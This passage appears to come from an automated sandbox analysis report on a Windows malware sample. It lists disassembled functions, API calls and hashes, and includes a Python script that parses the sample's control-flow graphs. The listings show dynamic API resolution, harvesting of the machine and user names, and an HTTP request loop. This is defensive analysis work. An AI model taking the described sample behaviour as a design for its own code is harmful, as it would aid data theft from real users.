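call 9aa7a0 call 9aa800 * 8 818->829 830 994ef5-994f2d call 9aa820 call 9aa9b0 call 9aa8a0 call 9aa800
818->830 819->818 905 994ad3-994ad7 819->905 906 994ad9-994ae3 905->906 907 994ae5 905->907
908 994aef-994b22 HttpOpenRequestA 906->908 907->908 909 994b28-994e28 call 9aa9b0 call 9aa8a0
call 9aa800 call 9aa920 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0
call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800
call 9aa920 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0
call 9aa800 call 9aa920 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0
call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800
call 9aa920 call 9aa8a0 call 9aa800 call 9aa740 call 9aa920 * 2 call 9aa8a0 call 9aa800 * 2
call 9aaad0 lstrlen call 9aaad0 * 2 lstrlen call 9aaad0 HttpSendRequestA 908->909
910 994ebe-994ec5 InternetCloseHandle 908->910 1021 994e32-994e5c InternetReadFile 909->1021
910->818 1022 994e5e-994e65 1023 994e67-994eb9 InternetCloseHandle call 9aa800 1021->1022
1021->1023 1024 994e69-994ea7 call 9aa9b0 call 9aa8a0 call 9aa800 1022->1023 1022->1024 1023->910
1024->1021
"""

NODE_RANGE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # "994880-994942" or a single "994944"
EDGE = re.compile(r"^(\d+)->(\d+)$")                       # "801->816"


def parse_cfg(text):
    """Parse the dump into {block_id: {"start", "end", "items"}} and {block_id: [successors]}.

    Assumed format (read off the dump itself): "<id> <start>[-<end>]" opens a block,
    "call <addr>" is an internal call, "* <n>" repeats the preceding item n times,
    any other word is a named Windows API call, and "<a>-><b>" is a control-flow edge.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, succs = {}, defaultdict(list)
    cur, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        if m := EDGE.match(tok):
            succs[int(m[1])].append(int(m[2]))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and NODE_RANGE.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].partition("-")
            cur = int(tok)
            blocks[cur] = {"start": int(start, 16), "end": int(end or start, 16), "items": []}
            i += 2
        elif tok == "call":
            blocks[cur]["items"].append("call " + tokens[i + 1])
            i += 2
        elif tok == "*":
            # repeat count applies to the item just appended (already counted once)
            blocks[cur]["items"].extend([blocks[cur]["items"][-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        else:
            blocks[cur]["items"].append(tok)   # a named API such as InternetReadFile
            i += 1
    return blocks, dict(succs)


def blocks_in_loops(blocks, succs):
    """Block ids that lie on a cycle, i.e. can reach themselves again through the edges."""
    on_cycle = set()
    for b in blocks:
        seen, stack = set(), list(succs.get(b, []))
        while stack:
            x = stack.pop()
            if x == b:
                on_cycle.add(b)
                break
            if x not in seen:
                seen.add(x)
                stack.extend(succs.get(x, []))
    return on_cycle


def apis_in_loops(blocks, succs):
    """Named API calls that can execute repeatedly because their block is inside a loop."""
    return sorted({item for b in blocks_in_loops(blocks, succs)
                   for item in blocks[b]["items"] if not item.startswith("call ")})


def api_sequence(blocks):
    """Named API calls in address order; for this function that is the WinINet request chain."""
    return [item for b in sorted(blocks.values(), key=lambda v: v["start"])
            for item in b["items"] if not item.startswith("call ")]


if __name__ == "__main__":
    blocks, succs = parse_cfg(CFG_TEXT)
    print("blocks:", len(blocks))
    print("loop blocks:", sorted(blocks_in_loops(blocks, succs)))
    print("APIs inside loops:", apis_in_loops(blocks, succs))
    print("API order:", " -> ".join(api_sequence(blocks)))
```

The same parser works on any control_flow_graph line in this report; running it over the resolver function further down shows no cycle at all, which is the other thing worth knowing about a block of 104 GetProcAddress calls.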
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 009A792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: d6aa9594f857ee5f41f8461fa122f27f094ceabd6d8fc1681a1bc98c3d98889d
                        • Instruction ID: ac2807f5742916fe5c5a0435d03d6f2188ce05d91a273781be4e7cce64a536e7
                        • Opcode Fuzzy Hash: d6aa9594f857ee5f41f8461fa122f27f094ceabd6d8fc1681a1bc98c3d98889d
                        • Instruction Fuzzy Hash: C10181B1A05208EFC710DF98DD46BABFBBCFB45B21F10461AFA45E3280D77559008BA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009911B7), ref: 009A7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 009A789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 5d7a168a6963c99725ddbb050b841e8b9f431d395082eabca2fc9172169c6a58
                        • Instruction ID: 16871dff328e3544e86f2ac6ae1e8dcc4fe580cfaa4a1a5ea825b280eb5bad74
                        • Opcode Fuzzy Hash: 5d7a168a6963c99725ddbb050b841e8b9f431d395082eabca2fc9172169c6a58
                        • Instruction Fuzzy Hash: 47F04FB1945208ABC700DF98DD4ABAEFBB8EB05711F10065AFA05A3680D77919048BE1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 0a9f093446c365be50bbde347b10efb9297ca13476d3f4a3da8759efd5e1ca1c
                        • Instruction ID: 1716d6e9f48a133467c37d91a5716631a505ef001282782f780300e4bffce330
                        • Opcode Fuzzy Hash: 0a9f093446c365be50bbde347b10efb9297ca13476d3f4a3da8759efd5e1ca1c
                        • Instruction Fuzzy Hash: 85D05E7490530DDBCB00DFE0D8496DDBB78FB08312F000596D90563340EE306881CAA6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        Basic blocks of the function at 0x9a9c10 (block id, address range, API calls, then successor blocks); each GetProcAddress batch is guarded by a short conditional block that can skip it:
                        • 633 (9a9c10-9a9c1a) -> 634, 635
                        • 634 (9a9c20-9aa031): GetProcAddress * 43 -> 635
                        • 635 (9aa036-9aa0ca): LoadLibraryA * 8 -> 636, 637
                        • 636 (9aa0cc-9aa141): GetProcAddress * 5 -> 637
                        • 637 (9aa146-9aa14d) -> 638, 639
                        • 638 (9aa153-9aa211): GetProcAddress * 8 -> 639
                        • 639 (9aa216-9aa21d) -> 640, 641
                        • 640 (9aa298-9aa29f) -> 642, 643
                        • 641 (9aa21f-9aa293): GetProcAddress * 5 -> 640
                        • 642 (9aa337-9aa33e) -> 644, 645
                        • 643 (9aa2a5-9aa332): GetProcAddress * 6 -> 642
                        • 644 (9aa41f-9aa426) -> 646, 647
                        • 645 (9aa344-9aa41a): GetProcAddress * 9 -> 644
                        • 646 (9aa428-9aa49d): GetProcAddress * 5 -> 647
                        • 647 (9aa4a2-9aa4a9) -> 648, 649
                        • 648 (9aa4ab-9aa4d7): GetProcAddress * 2 -> 649
                        • 649 (9aa4dc-9aa4e3) -> 650, 651
                        • 650 (9aa515-9aa51c) -> 652, 653
                        • 651 (9aa4e5-9aa510): GetProcAddress * 2 -> 650
                        • 652 (9aa612-9aa619) -> 654, 655
                        • 653 (9aa522-9aa60d): GetProcAddress * 10 -> 652
                        • 654 (9aa61b-9aa678): GetProcAddress * 4 -> 655
                        • 655 (9aa67d-9aa684) -> 656, 657
                        • 656 (9aa69e-9aa6a5) -> 658, 659
                        • 657 (9aa686-9aa699): GetProcAddress -> 656
                        • 658 (9aa708-9aa709)
                        • 659 (9aa6a7-9aa703): GetProcAddress * 4 -> 658
                        APIs
                        • GetProcAddress.KERNEL32(75900000,015A62E0), ref: 009A9C2D
                        • GetProcAddress.KERNEL32(75900000,015A6400), ref: 009A9C45
                        • GetProcAddress.KERNEL32(75900000,015B8F88), ref: 009A9C5E
                        • GetProcAddress.KERNEL32(75900000,015B8EF8), ref: 009A9C76
                        • GetProcAddress.KERNEL32(75900000,015BCA48), ref: 009A9C8E
                        • GetProcAddress.KERNEL32(75900000,015BCA00), ref: 009A9CA7
                        • GetProcAddress.KERNEL32(75900000,015AB5B8), ref: 009A9CBF
                        • GetProcAddress.KERNEL32(75900000,015BCAC0), ref: 009A9CD7
                        • GetProcAddress.KERNEL32(75900000,015BC8E0), ref: 009A9CF0
                        • GetProcAddress.KERNEL32(75900000,015BC820), ref: 009A9D08
                        • GetProcAddress.KERNEL32(75900000,015BC9D0), ref: 009A9D20
                        • GetProcAddress.KERNEL32(75900000,015A6460), ref: 009A9D39
                        • GetProcAddress.KERNEL32(75900000,015A6300), ref: 009A9D51
                        • GetProcAddress.KERNEL32(75900000,015A6320), ref: 009A9D69
                        • GetProcAddress.KERNEL32(75900000,015A6480), ref: 009A9D82
                        • GetProcAddress.KERNEL32(75900000,015BC958), ref: 009A9D9A
                        • GetProcAddress.KERNEL32(75900000,015BC838), ref: 009A9DB2
                        • GetProcAddress.KERNEL32(75900000,015AB388), ref: 009A9DCB
                        • GetProcAddress.KERNEL32(75900000,015A64E0), ref: 009A9DE3
                        • GetProcAddress.KERNEL32(75900000,015BC970), ref: 009A9DFB
                        • GetProcAddress.KERNEL32(75900000,015BC880), ref: 009A9E14
                        • GetProcAddress.KERNEL32(75900000,015BC8C8), ref: 009A9E2C
                        • GetProcAddress.KERNEL32(75900000,015BCA90), ref: 009A9E44
                        • GetProcAddress.KERNEL32(75900000,015A6420), ref: 009A9E5D
                        • GetProcAddress.KERNEL32(75900000,015BC988), ref: 009A9E75
                        • GetProcAddress.KERNEL32(75900000,015BC808), ref: 009A9E8D
                        • GetProcAddress.KERNEL32(75900000,015BC898), ref: 009A9EA6
                        • GetProcAddress.KERNEL32(75900000,015BC850), ref: 009A9EBE
                        • GetProcAddress.KERNEL32(75900000,015BC868), ref: 009A9ED6
                        • GetProcAddress.KERNEL32(75900000,015BCAD8), ref: 009A9EEF
                        • GetProcAddress.KERNEL32(75900000,015BC8B0), ref: 009A9F07
                        • GetProcAddress.KERNEL32(75900000,015BC9E8), ref: 009A9F1F
                        • GetProcAddress.KERNEL32(75900000,015BCA18), ref: 009A9F38
                        • GetProcAddress.KERNEL32(75900000,015B9E28), ref: 009A9F50
                        • GetProcAddress.KERNEL32(75900000,015BC928), ref: 009A9F68
                        • GetProcAddress.KERNEL32(75900000,015BC8F8), ref: 009A9F81
                        • GetProcAddress.KERNEL32(75900000,015A64A0), ref: 009A9F99
                        • GetProcAddress.KERNEL32(75900000,015BCA78), ref: 009A9FB1
                        • GetProcAddress.KERNEL32(75900000,015A6340), ref: 009A9FCA
                        • GetProcAddress.KERNEL32(75900000,015BCAA8), ref: 009A9FE2
                        • GetProcAddress.KERNEL32(75900000,015BC910), ref: 009A9FFA
                        • GetProcAddress.KERNEL32(75900000,015A6360), ref: 009AA013
                        • GetProcAddress.KERNEL32(75900000,015A6380), ref: 009AA02B
                        • LoadLibraryA.KERNEL32(015BC7F0,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA03D
                        • LoadLibraryA.KERNEL32(015BC940,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA04E
                        • LoadLibraryA.KERNEL32(015BC9A0,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA060
                        • LoadLibraryA.KERNEL32(015BC9B8,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA072
                        • LoadLibraryA.KERNEL32(015BCA30,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA083
                        • LoadLibraryA.KERNEL32(015BCA60,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA095
                        • LoadLibraryA.KERNEL32(015BCDA8,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA0A7
                        • LoadLibraryA.KERNEL32(015BCB38,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA0B8
                        • GetProcAddress.KERNEL32(75FD0000,015A67A0), ref: 009AA0DA
                        • GetProcAddress.KERNEL32(75FD0000,015BCD78), ref: 009AA0F2
                        • GetProcAddress.KERNEL32(75FD0000,015B8B30), ref: 009AA10A
                        • GetProcAddress.KERNEL32(75FD0000,015BCD90), ref: 009AA123
                        • GetProcAddress.KERNEL32(75FD0000,015A6760), ref: 009AA13B
                        • GetProcAddress.KERNEL32(73B30000,015AAFC8), ref: 009AA160
                        • GetProcAddress.KERNEL32(73B30000,015A6960), ref: 009AA179
                        • GetProcAddress.KERNEL32(73B30000,015AB0E0), ref: 009AA191
                        • GetProcAddress.KERNEL32(73B30000,015BCC88), ref: 009AA1A9
                        • GetProcAddress.KERNEL32(73B30000,015BCD48), ref: 009AA1C2
                        • GetProcAddress.KERNEL32(73B30000,015A69E0), ref: 009AA1DA
                        • GetProcAddress.KERNEL32(73B30000,015A66E0), ref: 009AA1F2
                        • GetProcAddress.KERNEL32(73B30000,015BCBF8), ref: 009AA20B
                        • GetProcAddress.KERNEL32(763B0000,015A6740), ref: 009AA22C
                        • GetProcAddress.KERNEL32(763B0000,015A6880), ref: 009AA244
                        • GetProcAddress.KERNEL32(763B0000,015BCD18), ref: 009AA25D
                        • GetProcAddress.KERNEL32(763B0000,015BCCA0), ref: 009AA275
                        • GetProcAddress.KERNEL32(763B0000,015A67C0), ref: 009AA28D
                        • GetProcAddress.KERNEL32(750F0000,015AB2C0), ref: 009AA2B3
                        • GetProcAddress.KERNEL32(750F0000,015AB2E8), ref: 009AA2CB
                        • GetProcAddress.KERNEL32(750F0000,015BCD30), ref: 009AA2E3
                        • GetProcAddress.KERNEL32(750F0000,015A6980), ref: 009AA2FC
                        • GetProcAddress.KERNEL32(750F0000,015A69A0), ref: 009AA314
                        • GetProcAddress.KERNEL32(750F0000,015AB270), ref: 009AA32C
                        • GetProcAddress.KERNEL32(75A50000,015BCC28), ref: 009AA352
                        • GetProcAddress.KERNEL32(75A50000,015A69C0), ref: 009AA36A
                        • GetProcAddress.KERNEL32(75A50000,015B8BA0), ref: 009AA382
                        • GetProcAddress.KERNEL32(75A50000,015BCCB8), ref: 009AA39B
                        • GetProcAddress.KERNEL32(75A50000,015BCD60), ref: 009AA3B3
                        • GetProcAddress.KERNEL32(75A50000,015A6840), ref: 009AA3CB
                        • GetProcAddress.KERNEL32(75A50000,015A67E0), ref: 009AA3E4
                        • GetProcAddress.KERNEL32(75A50000,015BCBC8), ref: 009AA3FC
                        • GetProcAddress.KERNEL32(75A50000,015BCCD0), ref: 009AA414
                        • GetProcAddress.KERNEL32(75070000,015A6820), ref: 009AA436
                        • GetProcAddress.KERNEL32(75070000,015BCDC0), ref: 009AA44E
                        • GetProcAddress.KERNEL32(75070000,015BCC40), ref: 009AA466
                        • GetProcAddress.KERNEL32(75070000,015BCDD8), ref: 009AA47F
                        • GetProcAddress.KERNEL32(75070000,015BCAF0), ref: 009AA497
                        • GetProcAddress.KERNEL32(74E50000,015A6800), ref: 009AA4B8
                        • GetProcAddress.KERNEL32(74E50000,015A68C0), ref: 009AA4D1
                        • GetProcAddress.KERNEL32(75320000,015A6900), ref: 009AA4F2
                        • GetProcAddress.KERNEL32(75320000,015BCB08), ref: 009AA50A
                        • GetProcAddress.KERNEL32(6F060000,015A6700), ref: 009AA530
                        • GetProcAddress.KERNEL32(6F060000,015A6A00), ref: 009AA548
                        • GetProcAddress.KERNEL32(6F060000,015A6A20), ref: 009AA560
                        • GetProcAddress.KERNEL32(6F060000,015BCB80), ref: 009AA579
                        • GetProcAddress.KERNEL32(6F060000,015A6680), ref: 009AA591
                        • GetProcAddress.KERNEL32(6F060000,015A6860), ref: 009AA5A9
                        • GetProcAddress.KERNEL32(6F060000,015A68E0), ref: 009AA5C2
                        • GetProcAddress.KERNEL32(6F060000,015A6940), ref: 009AA5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 009AA5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 009AA607
                        • GetProcAddress.KERNEL32(74E00000,015BCB20), ref: 009AA629
                        • GetProcAddress.KERNEL32(74E00000,015B8B10), ref: 009AA641
                        • GetProcAddress.KERNEL32(74E00000,015BCB98), ref: 009AA659
                        • GetProcAddress.KERNEL32(74E00000,015BCB50), ref: 009AA672
                        • GetProcAddress.KERNEL32(74DF0000,015A68A0), ref: 009AA693
                        • GetProcAddress.KERNEL32(6F9A0000,015BCCE8), ref: 009AA6B4
                        • GetProcAddress.KERNEL32(6F9A0000,015A6920), ref: 009AA6CD
                        • GetProcAddress.KERNEL32(6F9A0000,015BCD00), ref: 009AA6E5
                        • GetProcAddress.KERNEL32(6F9A0000,015BCB68), ref: 009AA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 72246b2395600fb8c628d345e91e01ceb19441f4e6df1cc0111d14b91220797a
                        • Instruction ID: b5bf85401771d907b7686cb75c9d53133d5630ef67a6923578e417b371f6c83f
                        • Opcode Fuzzy Hash: 72246b2395600fb8c628d345e91e01ceb19441f4e6df1cc0111d14b91220797a
                        • Instruction Fuzzy Hash: 20624AB5602241AFC344DFA8EDB8956BBF9F74C301704851BAA09C3264FE3A9941DF57

                        Control-flow Graph: function starting at 996280 (graph image not preserved; executed/not-executed node listing omitted)
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • InternetOpenA.WININET(009B0DFE,00000001,00000000,00000000,00000000), ref: 009962E1
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 00996303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00996335
                        • HttpOpenRequestA.WININET(00000000,GET,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00996385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009963BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009963D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009963FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0099646D
                        • InternetCloseHandle.WININET(00000000), ref: 009964EF
                        • InternetCloseHandle.WININET(00000000), ref: 009964F9
                        • InternetCloseHandle.WININET(00000000), ref: 00996503
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 1b199e8e12f08f8ad25e3c5b742c997ce105ac16a557ab8e3896653a6412e88f
                        • Instruction ID: 0f049b5fafb9787eb4cc4d9989f8160f5b27b77ec724f8f6bf1d83fcf2d36406
                        • Opcode Fuzzy Hash: 1b199e8e12f08f8ad25e3c5b742c997ce105ac16a557ab8e3896653a6412e88f
                        • Instruction Fuzzy Hash: C0716F71A00218ABDF14DFE4CC59BEEB778BB84700F108199F50A6B1D0DBB56A85CF92

                        Control-flow Graph: function starting at 9a5510 (graph image not preserved; executed/not-executed node listing omitted)
                        APIs
                          • Part of subcall function 009AA820: lstrlen.KERNEL32(00994F05,?,?,00994F05,009B0DDE), ref: 009AA82B
                          • Part of subcall function 009AA820: lstrcpy.KERNEL32(009B0DDE,00000000), ref: 009AA885
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5857
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5228
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5318
                          • Part of subcall function 009A52C0: lstrlen.KERNEL32(00000000), ref: 009A532F
                          • Part of subcall function 009A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 009A5364
                          • Part of subcall function 009A52C0: lstrlen.KERNEL32(00000000), ref: 009A5383
                          • Part of subcall function 009A52C0: lstrlen.KERNEL32(00000000), ref: 009A53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 009A5A1B
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 5110ebf554a74a3a3cd053ab5a565c630bafe6ee1744fb110894a4d4c40d11d1
                        • Instruction ID: c0f994f2d4ad611a9a9cb6b2bda1f5b5e97b2f8f4742023d8414652d392006b0
                        • Opcode Fuzzy Hash: 5110ebf554a74a3a3cd053ab5a565c630bafe6ee1744fb110894a4d4c40d11d1
                        • Instruction Fuzzy Hash: 4DE11E72A101049BCB54FBA4DDA6BFE737CABD5300F508529B41767191EF386A09CBD2

                        Control-flow Graph: function starting at 9a17a0 (graph image not preserved; executed/not-executed node listing omitted)
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 009A17C5
                        • ExitProcess.KERNEL32 ref: 009A17D1
                        Strings
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: deca31ed00e20fb4dedfd95ba346bfa0db33b0787a1a31aa0ece18af81846ef6
                        • Instruction ID: 45de8c053fa0eb71935f1ef60c1d07ad75cae211d1aa1246804d254ef9d8f720
